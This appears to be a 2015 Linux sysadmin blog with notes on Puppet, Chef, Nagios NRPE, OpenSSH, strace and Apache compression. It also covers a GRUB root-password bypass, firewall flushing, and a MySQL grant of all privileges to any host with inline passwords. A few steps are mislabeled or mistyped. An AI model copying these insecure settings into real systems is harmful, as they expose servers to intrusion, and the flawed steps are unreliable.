Linux Missive

Saturday, 19 September 2015

Install and Configure Puppet on Ubuntu 14.04

apt-get install openssl

configure dns for master and agent
dev.puppetmaster.com
dev.puppetagent.com

192.168.190.133
apt-get install puppetmaster

192.168.190.134
apt-get install puppet

nano /etc/puppet/puppet.conf
server=dev.puppetmaster.com

puppet agent --no-daemonize --onetime --verbose
Info: Creating a new SSL key for dev.puppetagent.com
Info: Caching certificate for ca
Info: csr_attributes file loading from /etc/puppet/csr_attributes.yaml
Info: Creating a new SSL certificate request for dev.puppetagent.com
Info: Certificate Request fingerprint (SHA256): ED:AD:10:24:4D:F0:FF:C1:11:D5:E1:94:AD:C7:01:3C:1B:E4:E0:E3:0F:14:16:ED:5A:F7:A1:E0:AE:76:07:51
Info: Caching certificate for ca
Exiting; no certificate found and waitforcert is disabled

puppet cert list
"dev.puppetagent.com" (SHA256) ED:AD:10:24:4D:F0:FF:C1:11:D5:E1:94:AD:C7:01:3C:1B:E4:E0:E3:0F:14:16:ED:5A:F7:A1:E0:AE:76:07:51

puppet cert sign "dev.puppetagent.com"
Notice: Signed certificate request for dev.puppetagent.com
Notice: Removing file Puppet::SSL::CertificateRequest dev.puppetagent.com at '/var/lib/puppet/ssl/ca/requests/dev.puppetagent.com.pem'

puppet agent --no-daemonize --onetime --verbose
Info: Retrieving plugin
Info: Caching catalog for dev.puppetagent.com
Info: Applying configuration version '1442726550'
Info: Creating state file /var/lib/puppet/state/state.yaml
Notice: Finished catalog run in 0.02 seconds

Example puppet configuration,

cd /etc/puppet/manifests/
nano site.pp

class toolbox {
file { '/usr/local/sbin/puppetsimple.sh':
owner => root, group => root, mode => 0755,
content => "#!/bin/sh\npuppet agent --onetime --no-daemonize --verbose $1\n",
}
}

node 'dev.puppetagent.com' {
include toolbox
}

puppet agent --no-daemonize --onetime --verbose
Info: Retrieving plugin
Info: Caching catalog for dev.puppetagent.com
Info: Applying configuration version '1442727359'
Notice: /Stage[main]/Toolbox/File[/usr/local/sbin/puppetsimple.sh]/ensure: defined content as '{md5}db35206364e274612ff0caee2ce0f9d0'
Notice: Finished catalog run in 0.05 seconds

puppetsimple.sh
Info: Retrieving plugin
Info: Caching catalog for dev.puppetagent.com
Info: Applying configuration version '1442728015'
Notice: Finished catalog run in 0.03 seconds

chmod 0123 /usr/local/sbin/puppetsimple.sh

puppet agent --no-daemonize --onetime --verbose
Info: Retrieving plugin
Info: Caching catalog for dev.puppetagent.com
Info: Applying configuration version '1442728015'
Notice: /Stage[main]/Toolbox/File[/usr/local/sbin/puppetsimple.sh]/mode: mode changed '0123' to '0755'
Notice: Finished catalog run in 0.03 seconds

Ref :- https://www.youtube.com/watch?v=Hiu_ui2nZa0

Change Hostname in Ubuntu

Manually Edit the hostname

sudo nano /etc/hosts
sudo nano /etc/hostname
sudo reboot

Use sed to change the hostname

sudo sed -i 's/ubuntu/new-hostname/g' /etc/hosts
sudo sed -i 's/ubuntu/new-hostname/g' /etc/hostname
sudo reboot

Write a Bash Script

#!/bin/bash
#Assign existing hostname to $hostn
hostn=$(cat /etc/hostname)

#Display existing hostname
echo "Existing hostname is $hostn"

#Ask for new hostname $newhost
echo "Enter new hostname: "
read newhost

#change hostname in /etc/hosts & /etc/hostname
sudo sed -i "s/$hostn/$newhost/g" /etc/hosts
sudo sed -i "s/$hostn/$newhost/g" /etc/hostname

#display new hostname
echo "Your new hostname is $newhost"

#Press a key to reboot
read -s -n 1 -p "Press any key to reboot"
sudo reboot

Ref:- https://pricklytech.wordpress.com/2013/04/24/ubuntu-change-hostname-permanently-using-the-command-line/

Friday, 18 September 2015

Regenerate SSL Certs on Puppet Master

SSL: Regenerating All Certificates in a Puppet Deployment

backup ssl dir
/var/lib/puppet/ssl

Stop the Puppet agent service
/etc/init.d/puppetmaster stop

Stop the Puppet master service
/etc/init.d/apache2 stop

Locate Puppet’s ssldir
puppet config print ssldir

Delete all files in the ssldir
rm -r /var/lib/puppet/ssl

Regenerate the CA by running
uppet cert list -a

Generate the Puppet master’s new certs
puppet master --no-daemonize --verbose

When you see Notice: Starting Puppet master <your Puppet version>,
type CTRL + C

Start the Puppet master service
/etc/init.d/puppetmaster start

Start the Puppet agent service
/etc/init.d/apache2 start

Ref : -
http://docs.puppetlabs.com/puppet/3.7/reference/ssl_regenerate_certificates.html

OpenSSH Server in Ubuntu

OpenSSH is a freely available version of the Secure Shell (SSH) protocol family of tools for remotely controlling, or transferring files between, computers.

apt-get install openssh-server

sudo cp /etc/ssh/sshd_config /etc/ssh/sshd_config.original
sudo chmod a-w /etc/ssh/sshd_config.original

The following are examples of configuration directives you may change:

To set your OpenSSH to listen on TCP port 2222 instead of the default TCP port 22, change the Port directive as such:

Port 22

To have sshd allow public key-based login credentials, simply add or modify the line:

PubkeyAuthentication yes

If the line is already present, then ensure it is not commented out.

To make your OpenSSH server display the contents of the /etc/issue.net file as a pre-login banner, simply add or modify the line:

Banner /etc/issue.net

In the /etc/ssh/sshd_config file.

sudo service ssh restart

Ref:- https://help.ubuntu.com/lts/serverguide/openssh-server.html

Thursday, 17 September 2015

Ubuntu 14.04 Root Password Recovery

First reboot/reset your system to GRUB2 boot loader menu.

Find the line which starts with "linux". Navigate to the end of the line and add:
init=/bin/bash

Once you have changed boot options as indicated in the previous step press F10 to instruct your Ubuntu system to boot.

Your system will boot and you will be provided with root command line prompt.

Once you get to the command line prompt enter the following commands:
mount -o remount,rw /
passwd
reboot -f

Ref :- http://linuxconfig.org/ubuntu-14-04-lost-password-recovery

Monday, 7 September 2015

Chef Installation and configure on CentOS

Install chef-server
iptables -F
rpm -ivh chef-server-11.1.7-1.el6.x86_64

Configure Chef Server
chef-server-ctl reconfigure

Running handlers:
Running handlers complete
Chef Client finished, 415/479 resources updated in 220.548599949 seconds
Chef Server Reconfigured!

Confirm Chef server is running by,

chef-server-ctl status
run: bookshelf: (pid 1084) 60730s; run: log: (pid 1083) 60730s
run: chef-expander: (pid 1080) 60730s; run: log: (pid 1079) 60730s
run: chef-server-webui: (pid 1070) 60730s; run: log: (pid 1068) 60730s
run: chef-solr: (pid 1076) 60730s; run: log: (pid 1073) 60730s
run: erchef: (pid 1085) 60730s; run: log: (pid 1082) 60730s
down: nginx: 0s, normally up, want up; run: log: (pid 1078) 60730s
run: postgresql: (pid 1091) 60730s; run: log: (pid 1072) 60730s
run: rabbitmq: (pid 1075) 60730s; run: log: (pid 1071) 60730s

Optionally, run the Opscode Pedant test suite. This will verify that everything is working.
chef-server-ctl test

Configure Chef Workstation

check Chef client pkg is already installed or not

rpmquery chef
package chef is not installed

rpm -ivh chef-11.18.12-1.el6.x86_64

rpmquery chef
chef-11.18.12-1.el6.x86_64

chef-client
To Secure communication with Chef server,

copy files from chef server path /etc/chef-server to chef workstation
scp -r admin.pem chef-validator.pem chef-webui.pem root@10.98.33.204:/root/.chef
admin.pem
chef-validator.pem
chef-webui.pem

mkdir .chef @ home and mv all 3 files inside dir

knife configure -i
Overwrite /root/.chef/knife.rb? (Y/N)Y
Please enter the chef server URL: [https://testchefwork.example.com:443] https://testchefserver.example.com:443
Please enter a name for the new user: [root]
Please enter the existing admin name: [admin] admin
Please enter the location of the existing admin's private key: [/etc/chef-server/admin.pem] /root/.chef/admin.pem
Please enter the validation clientname: [chef-validator]
Please enter the location of the validation key: [/etc/chef-server/chef-validator.pem] /root/.chef/chef-validator.pem
Please enter the path to a chef repository (or leave blank):
Creating initial API user...
Please enter a password for the new user:
Created user[root]
Configuration file written to /root/.chef/knife.rb

knife ssl fetch

knife ssl check

Connecting to host testchefserver.example.com:443
ERROR: The SSL certificate of testchefserver.example.com could not be verified
Certificate issuer data: /C=US/ST=WA/L=Seattle/O=YouCorp/OU=Operations/CN=testchefserver.example.com/emailAddress=you@example.com

Configuration Info:

OpenSSL Configuration:
* Version: OpenSSL 1.0.1m 19 Mar 2015
* Certificate file: /opt/chef/embedded/ssl/cert.pem
* Certificate directory: /opt/chef/embedded/ssl/certs
Chef SSL Configuration:
* ssl_ca_path: nil
* ssl_ca_file: nil
* trusted_certs_dir: "/root/.chef/trusted_certs"

TO FIX THIS ERROR:

If the server you are connecting to uses a self-signed certificate, you must
configure chef to trust that server's certificate.

By default, the certificate is stored in the following location on the host
where your chef-server runs:

/var/opt/chef-server/nginx/ca/SERVER_HOSTNAME.crt

Copy that file to you trusted_certs_dir (currently: /root/.chef/trusted_certs)
using SSH/SCP or some other secure method, then re-run this command to confirm
that the server's certificate is now trusted.

knife ssl check
Connecting to host testchefserver.example.com:443
Successfully verified certificates from `testchefserver.example.com'

knife client list

chef-validator
chef-webui
knife user list
admin
jojan
root

Node configuration

iptables -L

rpm -ivh chef-11.18.12-1.el6.x86_64.rpm

warning: chef-11.18.12-1.el6.x86_64.rpm: Header V4 DSA/SHA1 Signature, key ID 83ef826a: NOKEY
Preparing...                ########################################### [100%]
   1:chef                   ########################################### [100%]
Thank you for installing Chef!

copy chef-validator.pem from chef server path /etc/chef-server to /etc/chef in Node server

knife ssl fetch -s https://testchefserver.example.com

WARNING: No knife configuration file found
WARNING: Certificates from testchefserver.example.com will be fetched and placed in your trusted_cert
directory ().

Knife has no means to verify these are the correct certificates. You should
verify the authenticity of these certificates after downloading.

ERROR: TypeError: can't convert nil into String

knife ssl check
Connecting to host testchefserver.example.com:443
Successfully verified certificates from `testchefserver.example.com'
[root@testchefnode .chef]# knife ssl fetch -s https://testchefserver.example.com
WARNING: Certificates from testchefserver.example.com will be fetched and placed in your trusted_cert
directory (/root/.chef/trusted_certs).

Knife has no means to verify these are the correct certificates. You should
verify the authenticity of these certificates after downloading.

Adding certificate for testchefserver.example.com in /root/.chef/trusted_certs/testchefserver_example_com.crt

knife ssl check -s https://testchefserver.example.com

Connecting to host testchefserver.example.com:443
Successfully verified certificates from `testchefserver.example.com'

cat /etc/chef/client.rb
log_level :info
log_location STDOUT
chef_server_url "https://testchefserver.example.com:443"
trusted_certs_dir "/root/.chef/trusted_certs"

chef-client -S https://testchefserver.example.com -K /etc/chef/chef-validator.pem

creating a recipe on workstation and upload to server

knife cookbook create motd
** Creating cookbook motd
** Creating README for cookbook: motd
** Creating CHANGELOG for cookbook: motd
** Creating metadata for cookbook: motd

cd /var/chef/cookbooks/motd

ls -l
attributes
CHANGELOG.md
definitions
files
libraries
metadata.rb
providers
README.md
recipes
resources
templates

cd recipes/
vi default.rb

file '/etc/motd' do
        content 'Welcome to chef'
end

Before uploading to server make sure there is no syntax error

knife cookbook test motd
checking motd
Running syntax check on motd
Validating ruby files
Validating templates
Validating ruby files
Validating templates

upload to server,

knife cookbook upload motd
Uploading motd         [0.1.0]
Uploaded 1 cookbook.

to chk from server

knife cookbook list
motd   0.1.0

to chek from dashboard,
https://testchefserver.example.com/cookbooks

Add cookbook to a node,

go to https://testchefserver.example.com/nodes and edit
drag and drop Available Recipes moted to Run List,

chef-client
[2015-09-07T11:17:30+05:30] INFO: Forking chef instance to converge...
[2015-09-07T11:17:30+05:30] WARN:
........................................
- update content in file /etc/motd from e3b0c4 to cad802
    --- /etc/motd       2010-01-12 18:58:22.000000000 +0530
    +++ /tmp/.motd20150907-26207-mb0jjs 2015-09-07 11:17:32.622947241 +0530
    @@ -1 +1,2 @@
    +Welcome to chef
    - restore selinux security context
[2015-09-07T11:17:32+05:30] INFO: Chef Run complete in 0.661581977 seconds

Running handlers:
[2015-09-07T11:17:32+05:30] INFO: Running report handlers
Running handlers complete
[2015-09-07T11:17:32+05:30] INFO: Report handlers complete
Chef Client finished, 1/1 resources updated in 2.350334219 seconds

now cat it in node server,

cat /etc/motd
Welcome to chef

Ref:- https://www.youtube.com/watch?v=egvEPsVMfK0

Wednesday, 2 September 2015

Disable FirewallD and use iptables in RHEL 7 and CentOS 7

If you want to use iptables on CentOS 7 and RHEL 7 instead of firewallD Please follow,

systemctl mask firewalld

systemctl stop firewalld

yum -y install iptables-services

systemctl enable iptables

Ref: http://www.tejasbarot.com/2014/08/02/rhel-7-centos-7-disable-firewalld-and-use-iptables/#axzz3keP3fIkw

FirewallD

FirewallD provides a dynamically managed firewall with support for network/firewall zones to define the trust level of network connections or interfaces. It has support for IPv4, IPv6 firewall settings and for ethernet bridges and has a separation of runtime and permanent configuration options. It also supports an interface for services or applications to add firewall rules directly.

Features
D-Bus API
Timed firewall rules
Rich Language for specific firewall rules
IPv4 and IPv6 NAT support
Lockdown: Whitelisting of applications that may modify the firewall
Support for iptables, ip6tables, ebtables firewall backends
Automatic loading of Linux kernel modules
Integration with Puppet

Who’s using it?
FirewallD is used in the following Linux distributions as the default firewall management tool:

RHEL 7
Fedora 18 and newer

Applications and libraries which support FirewallD as a firewall management tool include:

NetworkManager
libvirt
docker 1.7

Ref: http://www.firewalld.org/

Monday, 27 July 2015

Testing SMTP Server from the windows command line

C:\Users\Administrator>telnet relay.mx.testserver.com 25

220 mb1relay1.mx.testserver.com ESMTP
helo test
250 mb1relay1.mx.testserver.com
mail from: usename1@mail.com
250 sender <usename1@mail.com> ok
rcpt to: usename2@mail.com
250 recipient <usename2@mail.com> ok
data
354 go ahead
Hi How are you
.
250 ok: Message 258249 accepted
quit
221 mb1relay1.mx.testserver.com

Connection to host lost.

Ref :- https://www.youtube.com/watch?v=lfYtz3uRPYc

Sunday, 26 July 2015

Nullifying a log file

Clear a file using /dev/null

/dev/null is often referred to a black hole in Linux based systems. It discards all the data written to it and sends EOF (End of File) character to any process reading data from it. With this logic, we can clear the contents of a file.

cp /dev/null logfile

cat /dev/null > logfile

> logfile

dd if=/dev/null of=logfile

Clear a file using truncate

truncate logfile --size 0

Wednesday, 20 May 2015

strace

strace is a useful diagnostic, instructional, and debugging tool.

Strace monitors the system calls and signals of a specific program. It is helpful when you do not have the source code and would like to debug the execution of a program. strace provides you the execution sequence of a binary from start to end.

strace shows you how data is passed between the program and the kernel. With no options, strace prints a line for each system call. It shows the call name, given arguments, return value, and any generated error messages. A signal is printed with both its signal symbol and a descriptive string. As it shows the data transfer between user and kernel-space, strace is very useful as both a diagnostic utility for system administrators and a debugging tool for programmers. By default, the output is written to standard error.

Trace the Execution of an Executable
strace ls

Trace a Specific System Calls in an Executable Using Option -e
strace -e open ls

Save the Trace Execution to a File Using Option -o
strace -o output.txt ls

Execute Strace on a Running Linux Process Using Option -p
ps -C firefox-bin

Print Timestamp for Each Trace Output Line Using Option -t
strace -t -e open ls /home

Print Relative Time for System Calls Using Option -r
strace -r ls

Generate Statistics Report of System Calls Using Option -c
strace -c ls /home

eg :-
strace -p 3107
strace -d -p 3107

To print instruction pointer at the time of system call
strace -i -p 3111

To print time stamps of the system call
strace -t -p 3111

Options

-a n
Align the return values in column n. The default is 40.

-c
Count system calls, errors, signals, and time and provide a summary report when the program has ended.

-d
Debug mode. Print debugging information for strace on stderr.

-e [keyword=] [!] values
Pass an expression to strace to limit the types of calls or signals that are traced or to change how they are displayed. If no keyword is given, trace is assumed. The values can be given as a comma-separated list. Preceding the list with an exclamation point (!) negates the list. The special values all and none are valid, as are the values listed with the following keywords.

abbrev=names Abbreviate output from large structures for system calls listed in names. read=descriptors Print all data read from the given file descriptors. signal=symbols Trace the listed signal symbols (for example, signal=SIGIO,SIGHUP).

trace=sets
sets may be a list of system call names or one of the following:

file
Calls that take a filename as an argument.

ipc
Interprocess communication.

network
Network-related.

process
Process management.

signal
Signal-related.

raw=names
Print arguments for the given system calls in hexadecimal.

verbose=names
Unabbreviate structures for the given system calls. Default is none.

write=descriptors
Print all data written to the given file descriptors.

-f
Trace forked processes.

-ff
Write system calls for forked processes to separate files named filename.pid when using the -o option.

-h
Print help and exit.

-i
Print the current instruction pointer with each system call.

-o filename
Write output to filename instead of stderr. If filename starts with the pipe symbol |, treat the rest of the name as a command to which output should be piped.

-O n
Override strace's built-in timing estimates, and just subtract n microseconds from the timing of each system call to adjust for the time it takes to measure the call.

-p pid
Attach to the given process ID and begin tracking. strace can track more than one process if more than one option -p is given.

Type Ctrl-C to end the trace.

-q
Quiet mode. Suppress attach and detach messages from strace.

-r
Relative timestamp. Print time in microseconds between system calls.

-s n
Print only the first n characters of a string. Default value is 32.

-S value
Sort output of -c option by the given value. value may be calls, name, time, or nothing. Default is time.

-T
Print time spent in each system call.

-t
Print time of day on each line of output.

-tt
Print time of day with microseconds on each line of output.

-ttt
Print timestamp on each line as the number of seconds and microseconds since the Epoch.

-u username
Run command as username. Needed when tracing setuid and setgid programs.

-V
Print version and exit.

-v
Verbose. Do not abbreviate structure information.

-x
Print all non-ASCII strings in hexadecimal.

-xx
Print all strings in hexadecimal.

Ref:-
http://www.thegeekstuff.com/2011/11/strace-examples/
http://www.linuxdevcenter.com/cmd/cmd.csp?path=s/strace
http://chadfowler.com/blog/2014/01/26/the-magic-of-strace/

Fields of an inode

Inode is a data structure used to represent a filesystem object, which can be one of various things including a file or a directory. Each inode stores the attributes and disk block location(s) of the filesystem object's data. Filesystem object attributes may include manipulation metadata (e.g. change, access, modify time), as well as owner and permission data (e.g. group-id, user-id, permissions).

ls -il
total 52
185033 -rw-------. 1 root root 979 Apr 25 23:23 anaconda-ks.cfg
393286 drwxr-xr-x. 2 root root 4096 Apr 29 09:09 Desktop
393290 drwxr-xr-x. 2 root root 4096 Apr 29 09:09 Documents
393287 drwxr-xr-x. 2 root root 4096 Apr 29 09:09 Downloads
393291 drwxr-xr-x. 2 root root 4096 Apr 29 09:09 Music
393292 drwxr-xr-x. 2 root root 4096 Apr 29 09:09 Pictures
185050 -rw-r--r--. 1 root root 11955 Apr 23 2013 post-install
185053 -rw-r--r--. 1 root root 552 Apr 23 2013 post-install.log
393289 drwxr-xr-x. 2 root root 4096 Apr 29 09:09 Public
393288 drwxr-xr-x. 2 root root 4096 Apr 29 09:09 Templates
393293 drwxr-xr-x. 2 root root 4096 Apr 29 09:09 Videos

File attributes in particular,

The size of the file in Kilo bytes

Device ID

User ID of the file

Group ID of the file

The file mode that determines the file type and how the owner, group, and others (world) can access the file
Additional system and user flags to further protect the file (note: this can be used limit the files use and modification)

Timestamps telling when the inode itself was last change (ctime, changing time), the file content was last modified (mtime or modification time), and when the file was last accessed (atime or access time)

A link counter that lists how many hard links point to the inode
Pointers to the disk blocks that store the file’s contents (more on that later)

Ref:-
http://en.wikipedia.org/wiki/Inode
http://www.linux-mag.com/id/8658/
http://teaching.idallen.com/dat2330/04f/notes/links_and_inodes.html

Tuesday, 7 April 2015

Nagios Client configuration

Nagios Client configuration:-

Windows
------------
http://nsclient.org/nscp/downloads
install NSCP agent and give nagios Server IP

In nagios server,

vi /usr/local/nagios/etc/objects/myclientserver.cfg
vi /usr/local/nagios/etc/nagios.cfg

Add entry for myclientserver.cfg
/usr/local/nagios/bin/nagios -v /usr/local/nagios/etc/nagios.cfg
/etc/init.d/nagios restart

Linux
------------
Download the required packages example,
nrpe-2.14.tar.gz
nagios-plugins-2.0.tar.gz

tar -xzvf nagios-plugins-2.0.tar.gz
tar -xzvf nrpe-2.14.tar.gz

yum install gcc
yum install openssl*
ldconfig

cd nagios-plugins-2.0
./configure
make
make install
useradd nagios
chown -R nagios:nagios /usr/local/nagios

cd ../nrpe-2.14
./configure
make all
make install-plugin
make install-daemon
yum install xinetd
make install-daemon-config
make install-xinetd

vi /etc/xinetd.d/nrpe
only_from       = 127.0.0.1 10.11.22.22

vi /etc/services
nrpe            5666/tcp                # nrpe

/etc/init.d/xinetd restart
netstat -an | grep -i 5666

yum install telnet
telnet 10.11.22.22 5666

ifconfig
yum install sysstat

cd /usr/local/nagios/
mv /home/agoviku/libexec.tar.gz .
mv /home/agoviku/md5s .
chown -R nagios.nagios /usr/local/nagios
tar -xzvf libexec.tar.gz

scp -r /usr/local/nagios/libexec usename@10.11.11.59:/tmp

cp -r /tmp/libexec /usr/local/nagios/
chown -R nagios:nagios /usr/local/nagios/
chmod -R 755 /usr/local/nagios/libexec

For Web servers,
vi /usr/local/nagios/etc/nrpe.cfg
command[check_users]=/usr/local/nagios/libexec/check_users -w 5 -c 10
command[check_load]=/usr/local/nagios/libexec/check_load -w 15,10,5 -c 30,25,20
command[check_disk1]=/usr/local/nagios/libexec/check_disk -w 20% -c 10% -p /
command[check_disk2]=/usr/local/nagios/libexec/check_disk -w 20% -c 10% -p /data
command[check_zombie_procs]=/usr/local/nagios/libexec/check_procs -w 5 -c 10 -s Z
command[check_total_procs]=/usr/local/nagios/libexec/check_procs -w 400 -c 450
command[check_sendmail]=/usr/local/nagios/libexec/check_tcp -H localhost -p 25
command[check_cpu]=/usr/local/nagios/libexec/check_cpu.sh -w 60 -c 90
command[check_rofs1]=/usr/local/nagios/libexec/check_rofs.sh /
command[check_rofs2]=/usr/local/nagios/libexec/check_rofs.sh /data
command[check_md5]=/usr/local/nagios/libexec/check_md5.sh /etc/httpd/conf.d/vhost.conf
command[check_crond]=/usr/local/nagios/libexec/check_procs -c 1:20 -C crond
command[check_apache]=/usr/local/nagios/libexec/check_apache.sh -w 100 -c 200
command[check_apache2]=/usr/local/nagios/libexec/check_apache2.sh -w 100 -c 200

For DB servers,
vi /usr/local/nagios/etc/nrpe.cfg
command[check_users]=/usr/local/nagios/libexec/check_users -w 5 -c 10
command[check_load]=/usr/local/nagios/libexec/check_load -w 15,10,5 -c 30,25,20
command[check_disk]=/usr/local/nagios/libexec/check_disk -w 20% -c 10% -p /data
command[check_zombie_procs]=/usr/local/nagios/libexec/check_procs -w 5 -c 10 -s Z
command[check_total_procs]=/usr/local/nagios/libexec/check_procs -w 250 -c 300
command[check_cpu]=/usr/local/nagios/libexec/check_cpu.sh -w 60 -c 90
command[check_md5]=/usr/local/nagios/libexec/check_md5.sh /etc/my.cnf
command[check_mysql]=/usr/local/nagios/libexec/check_mysql -u nagiosusr -p 'passwrod' -s /data/var/lib/mysql/mysql.sock
command[check_mysql2]=/usr/local/nagios/libexec/check_mysql_health --hostname localhost --username nagiosusr --password 'passwrod' --mode threads-connected   mysql2
command[check_mysql3]=/usr/local/nagios/libexec/check_mysql_health --hostname localhost --username nagiosusr --password 'passwrod' --mode threadcache-hitrate mysql3
command[check_mysql4]=/usr/local/nagios/libexec/check_mysql_health --hostname localhost --username nagiosusr --password 'passwrod' --mode threads-created mysql4
command[check_mysql5]=/usr/local/nagios/libexec/check_mysql_health --hostname localhost --username nagiosusr --password 'passwrod' --mode threads-running mysql5
command[check_mysql6]=/usr/local/nagios/libexec/check_mysql_health --hostname localhost --username nagiosusr --password 'passwrod' --mode threads-cached mysql6
command[check_mysql7]=/usr/local/nagios/libexec/check_mysql_health --hostname localhost --username nagiosusr --password 'passwrod' --mode connects-aborted mysql7
command[check_mysql8]=/usr/local/nagios/libexec/check_mysql_health --hostname localhost --username nagiosusr --password 'passwrod' --mode clients-aborted mysql8
command[check_mysql9]=/usr/local/nagios/libexec/check_mysql_health --hostname localhost --username nagiosusr --password 'passwrod' --mode qcache-hitrate --lookback 1800 --warning 50 --critical 20 mysql9
command[check_mysql10]=/usr/local/nagios/libexec/check_mysql_health --hostname localhost --username nagiosusr --password 'passwrod' --mode qcache-lowmem-prunes mysql10
command[check_mysql11]=/usr/local/nagios/libexec/check_mysql_health --hostname localhost --username nagiosusr --password 'passwrod' --mode keycache-hitrate --warning 50: --critical 20: mysql11
command[check_mysql12]=/usr/local/nagios/libexec/check_mysql_health --hostname localhost --username nagiosusr --password 'passwrod' --mode bufferpool-hitrate mysql12
command[check_mysql13]=/usr/local/nagios/libexec/check_mysql_health --hostname localhost --username nagiosusr --password 'passwrod' --mode   bufferpool-wait-free mysql13
command[check_mysql14]=/usr/local/nagios/libexec/check_mysql_health --hostname localhost --username nagiosusr --password 'passwrod' --mode   log-waits mysql14
command[check_mysql15]=/usr/local/nagios/libexec/check_mysql_health --hostname localhost --username nagiosusr --password 'passwrod' --mode   tablecache-hitrate mysql15
command[check_mysql16]=/usr/local/nagios/libexec/check_mysql_health --hostname localhost --username nagiosusr --password 'passwrod' --mode   table-lock-contention mysql16
command[check_mysql17]=/usr/local/nagios/libexec/check_mysql_health --hostname localhost --username nagiosusr --password 'passwrod' --mode index-usage --warning 30: --critical 10: mysql17
command[check_mysql18]=/usr/local/nagios/libexec/check_mysql_health --hostname localhost --username nagiosusr --password 'passwrod' --mode tmp-disk-tables mysql18
command[check_mysql19]=/usr/local/nagios/libexec/check_mysql_health --hostname localhost --username nagiosusr --password 'passwrod' --mode   open-files mysql19
command[check_mysql20]=/usr/local/nagios/libexec/check_mysql_health --hostname localhost --username nagiosusr --password 'passwrod' --mode   slow-queries mysql20
command[check_mysql21]=/usr/local/nagios/libexec/check_mysql_health --hostname localhost --username nagiosusr --password 'passwrod' --mode   long-running-procs mysql21

In nagios server,
vi /usr/local/nagios/etc/nagios.cfg
/usr/local/nagios/bin/nagios -v /usr/local/nagios/etc/nagios.cfg
/etc/init.d/nagios restart

install check_mysql_health in /usr/local/nagios/libexec

yum -y install cpan DBI*
cpan
install Time::HiRes
exit
yum -y install DBI*
cpan
install DBD::mysql
exit
ln -s /data/var/lib/mysql/mysql.sock /var/lib/mysql/mysql.sock

Ref :- https://labs.consol.de/nagios/check_mysql_health/

Few Known errors :-
-------------------------------------------------------------
/usr/local/nagios/libexec/check_nrpe -H 10.111.111.33 -p 5666
CHECK_NRPE: Error - Could not complete SSL handshake.

vi /etc/xinetd.d/nrpe
only_from       = 127.0.0.1 10.11.22.22

service xinetd restart

/usr/local/nagios/libexec/check_nrpe -H 10.33.66.10 -p 5666
NRPE v2.14

Ref: http://assets.nagios.com/downloads/nagiosxi/docs/NRPE-Troubleshooting-and-Common-Solutions.pdf
-------------------------------------------------------------
File Integrity
CRITICAL - file does not exist!(Nagios)

ll /etc/httpd/conf.d/vhost.conf
ls: cannot access /etc/httpd/conf.d/vhost.conf: No such file or directory
touch /etc/httpd/conf.d/vhost.conf

/usr/local/nagios/libexec/check_md5.sh /etc/httpd/conf.d/vhost.conf
OK
-------------------------------------------------------------
mysql Access denied for user 'monitor'@'localhost' (using password: YES)

grant all on *.* to 'nagiosusr'@'%' identified by 'passwrod';
FLUSH PRIVILEGES;
-------------------------------------------------------------------------

Tuesday, 3 March 2015

Data Compression Using mod_deflate

The mod_deflate module provides the DEFLATE output filter that allows output from your server to be compressed before being sent to the client over the network. Currently mod_deflate is using with newer version of Apache. mod_deflate is the replacement of mod_gzip which was used with older verion of Apache.

Enabling Compression

By default mod_deflate modules are enabled in Apache. To make sure check following line in Apache configuration file.

LoadModule deflate_module modules/mod_deflate.so

Enable mod_deflate by editing apache conf(vhost.conf) file for particular website,

<Directory "/path/">
       <IfModule mod_mime.c>
                AddType application/x-javascript .js
                AddType text/css .css
        </IfModule>
        <IfModule mod_deflate.c>
                AddOutputFilterByType DEFLATE text/css application/x-javascript text/x-component text/html text/plain text/xml application/javascript
        </IfModule>
        Header append Vary User-Agent env=!dont-vary
    </Directory>

OR

Enable mod_deflate by editing apache conf(httpd.conf) file,

Add the following lines to configure mod_deflate in your apache configuration file.

<IfModule mod_deflate.c>
# compress text, html, javascript, css, xml:
AddOutputFilterByType DEFLATE text/plain
AddOutputFilterByType DEFLATE text/html
AddOutputFilterByType DEFLATE text/xml
AddOutputFilterByType DEFLATE text/css
AddOutputFilterByType DEFLATE application/xml
AddOutputFilterByType DEFLATE application/xhtml+xml
AddOutputFilterByType DEFLATE application/rss+xml
AddOutputFilterByType DEFLATE application/javascript
AddOutputFilterByType DEFLATE application/x-javascript
AddOutputFilterByType DEFLATE image/x-icon
</IfModule>

To set the no-gzip note for a particular browser, so that no compression will be performed.

<Directory /var/www/html/>
    <IfModule mod_mime.c>
        AddType application/x-javascript .js
        AddType text/css .css
    </IfModule>
    <IfModule mod_deflate.c>
        AddOutputFilterByType DEFLATE text/css application/x-javascript text/x-component text/html text/plain text/xml application/javascript
        <IfModule mod_setenvif.c>
            BrowserMatch ^Mozilla/4 gzip-only-text/html
            BrowserMatch ^Mozilla/4\.0[678] no-gzip
            BrowserMatch \bMSIE !no-gzip !gzip-only-text/html
        </IfModule>
    </IfModule>
    Header append Vary User-Agent env=!dont-vary
</Directory>

Restart the apache service to complete the process

# service httpd restart

Testing Compression

After configuring compression in Apache we can see that content is being send by web server is compressed by mod_defalte by using below URL.
http://www.whatsmyip.org/http-compression-test/

Ref : http://tecadmin.net/how-to-enable-gzip-compression-on-apache/

Sunday, 1 March 2015

Troubleshooting high loads on Linux servers

The load average represents the average number of processes that have to wait for CPU time during the last 1, 5 or 15 minutes.

What causes high server loads?

Excessive usage of any of the following items can typically cause this issue:

CPU
memory (including swap)
disk I/O

How can I check these items?

That depends whether you want to review their current resource usage, or historical resource usage.

Historical resource usage can be viewed using the "sar" utility.

The stats are collected when sysstat runs from cron (/etc/cron.d/sysstat). If crond is not running, sysstat will not be able to collect historical statistics.

or example, if you wanted to view the load averages for your server from the 28rd of the month:
sar -q -f /var/log/sa/sa28

the current day status: sar -q
Current CPU usage: top c
Historical CPU usage : sar -p
Current memory usage: free -m
Historical memory usage: sar -r (%memused and %swpused), sar -s (%swpused)
Current disk I/O usage: iostat -x 1 10
Historial disk I/O usage : sar -d
process list: ps auxwwwf
system’s virtual memory statistics: vmstat 5 10 (10 times at 5 second intervals)

There are various actions you can take to find the cause of your high server loads. Here is a partial list that will always be incomplete:

Check the MySQL process list using "mysqladmin processlist" (or just "mysqladmin pr" for short)
Check the MySQL process list using mytop
tail your logs! Listening to what your server says is very important. Is your server being brute forced?
Run dmesg and check for possible hardware issues
Use netstat to view the connections to your server

Here are some logs to check:

syslogs: /var/log/messages, /var/log/secure
SMTP logs: /var/log/exim_mainlog, /var/log/exim_rejectlog, /var/log/exim_paniclog
POP3/IMAP logs: /var/log/maillog
Apache logs: /usr/local/apache/logs/access_log, /usr/local/apache/logs/error_log, /usr/local/apache/logs/suexec_log, /usr/local/apache/logs/suphp_log
